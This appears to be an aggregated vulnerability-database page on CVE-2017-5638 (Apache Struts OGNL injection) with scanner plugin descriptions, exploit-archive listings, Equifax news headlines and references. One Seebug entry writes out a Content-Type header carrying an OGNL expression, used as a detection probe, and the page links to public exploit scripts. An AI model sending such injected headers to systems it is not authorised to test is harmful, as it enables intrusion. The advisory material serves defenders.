NASL family Misc. NASL id ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL description The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A flaw exists in Jython due to executable classes being created with insecure permissions. A local attacker can exploit this to bypass intended access restrictions and thereby disclose sensitive information or gain elevated privileges. (CVE-2013-2027) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638) - An unspecified flaw exists in the Web Services component that allows an unauthenticated, remote attacker to have an impact on integrity and availability. (CVE-2017-10063) - An unspecified flaw exists in the Web Container component that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2017-10123) - An unspecified flaw exists in the JNDI component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-10137) - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-10147) - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to have an impact on integrity. (CVE-2017-10148) - An unspecified flaw exists in the Web Container component that allows an unauthenticated, remote attacker to have an impact on confidentiality and integrity. (CVE-2017-10178) last seen 2020-06-01 modified 2020-06-02 plugin id 101815 published 2017-07-19 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101815 title Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU) NASL family CGI abuses NASL id MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL description According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.7.8023, 3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is, therefore, affected by multiple vulnerabilities : - A denial of service vulnerability exists in the Apache Commons component in the FileUpload functionality due to improper handling of file upload requests. An unauthenticated, remote attacker can exploit this, via a specially crafted content-type header, to cause a denial of service condition. Note that this vulnerability does not affect MySQL Enterprise Monitor versions 3.3.x. (CVE-2016-3092) - An unspecified flaw exists in the Apache Struts component that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436) - A carry propagation error exists in the OpenSSL component in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055) - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity. (CVE-2017-3306) - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact integrity and availability. (CVE-2017-3307) - An out-of-bounds read error exists in the OpenSSL component when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. (CVE-2017-3731) - A carry propagating error exists in the OpenSSL component in the x86_64 Montgomery squaring implementation that may cause the BN_mod_exp() function to produce incorrect results. An unauthenticated, remote attacker with sufficient resources can exploit this to obtain sensitive information regarding private keys. (CVE-2017-3732) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638) last seen 2020-06-01 modified 2020-06-02 plugin id 99593 published 2017-04-21 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99593 title MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)
Packetstorm
data source https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt id PACKETSTORM:141630 last seen 2017-03-15 published 2017-03-14 reporter egypt source https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html title Apache Struts Jakarta Multipart Parser OGNL Injection data source https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt id PACKETSTORM:141576 last seen 2017-03-12 published 2017-03-10 reporter anarc0der source https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html title Apache Struts 2 2.3.x / 2.5.x Remote Code Execution
Saint
bid | 96729 |
description | Apache Struts 2 Jakarta Multipart Parser file upload command execution |
id | web_dev_struts2jakartarce |
title | apache_struts2_jakarta_file_upload_command_execution |
type | remote |
Seebug
bulletinFamily exploit description It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638). id SSV:92804 last seen 2017-11-19 modified 2017-03-21 published 2017-03-21 reporter Root title S2-046: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638) bulletinFamily exploit description Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command. Sound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data` Such as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability. id SSV:92746 last seen 2017-11-19 modified 2017-03-06 published 2017-03-06 reporter Root title S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
The Hacker News
id THN:ACD3479531482E2CA5A8E15EB6B47523 last seen 2018-01-27 modified 2017-10-03 published 2017-10-02 reporter Swati Khandelwal source https://thehackernews.com/2017/10/equifax-credit-security-breach.html title Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach id THN:2707247140A4F620671B33D68FEB1EA9 last seen 2018-01-27 modified 2017-03-09 published 2017-03-09 reporter Swati Khandelwal source https://thehackernews.com/2017/03/apache-struts-framework.html title New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild id THN:6C0E5E35ABB362C8EA341381B3DD76D6 last seen 2018-01-27 modified 2017-09-15 published 2017-09-13 reporter Swati Khandelwal source https://thehackernews.com/2017/09/equifax-apache-struts.html title Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw id THN:89C2482FECD181DD37C6DAEEB7A66FA9 last seen 2018-08-23 modified 2018-08-23 published 2018-08-22 reporter The Hacker News source https://thehackernews.com/2018/08/apache-struts-vulnerability.html title New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers id THN:3F47D7B66C8A65AB31FAC5823C96C34D last seen 2018-01-27 modified 2017-09-12 published 2017-09-11 reporter Swati Khandelwal source https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html title Apache Struts 2 Flaws Affect Multiple Cisco Products id THN:AF93AEDBDE6169AD1163D53979A4EA04 last seen 2018-09-20 modified 2018-09-20 published 2018-09-20 reporter The Hacker News source https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html title UK Regulator Fines Equifax £500,000 Over 2017 Data Breach
Related news
- One Year Later, Hackers Still Target Apache Struts Flaw (source)
- Companies turn a blind eye to open source risk (source)
- Week in review: Dangerous Bluetooth, EU cybersecurity certification, how Equifax hackers got in (source)
- Equifax Confirms March Struts Vulnerability Behind Breach (source)
- Equifax breach happened because of a missed patch (source)
- Apache servers under attack through easily exploitable Struts 2 flaw (Help Net Security) (source)
- FTC threatens “legal action” over unpatched Log4j and other vulns (source)
References
- https://isc.sans.edu/diary/22169
- https://github.com/rapid7/metasploit-framework/issues/8064
- https://cwiki.apache.org/confluence/display/WW/S2-045
- http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
- http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
- https://packetstormsecurity.com/files/141494/S2-45-poc.py.txt
- https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
- https://github.com/mazen160/struts-pwn
- https://exploit-db.com/exploits/41570
- https://twitter.com/theog150/status/841146956135124993
- https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
- http://www.securityfocus.com/bid/96729
- http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html
- https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
- https://support.lenovo.com/us/en/product_security/len-14200
- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_us
- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_us
- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_us
- http://www.securitytracker.com/id/1037973
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- https://www.exploit-db.com/exploits/41614/
- https://www.symantec.com/security-center/network-protection-security-advisories/SA145
- https://struts.apache.org/docs/s2-046.html
- https://struts.apache.org/docs/s2-045.html
- https://cwiki.apache.org/confluence/display/WW/S2-046
- https://www.kb.cert.org/vuls/id/834067
- https://security.netapp.com/advisory/ntap-20170310-0001/
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
- https://git1-us-west.apache.org/repos/asf?p=struts.git%3Ba=commit%3Bh=352306493971e7d5a756d61780d57a76eb1f519a
- https://git1-us-west.apache.org/repos/asf?p=struts.git%3Ba=commit%3Bh=6b8272ce47160036ed120a48345d9aa884477228
- https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E
- https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E
- https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E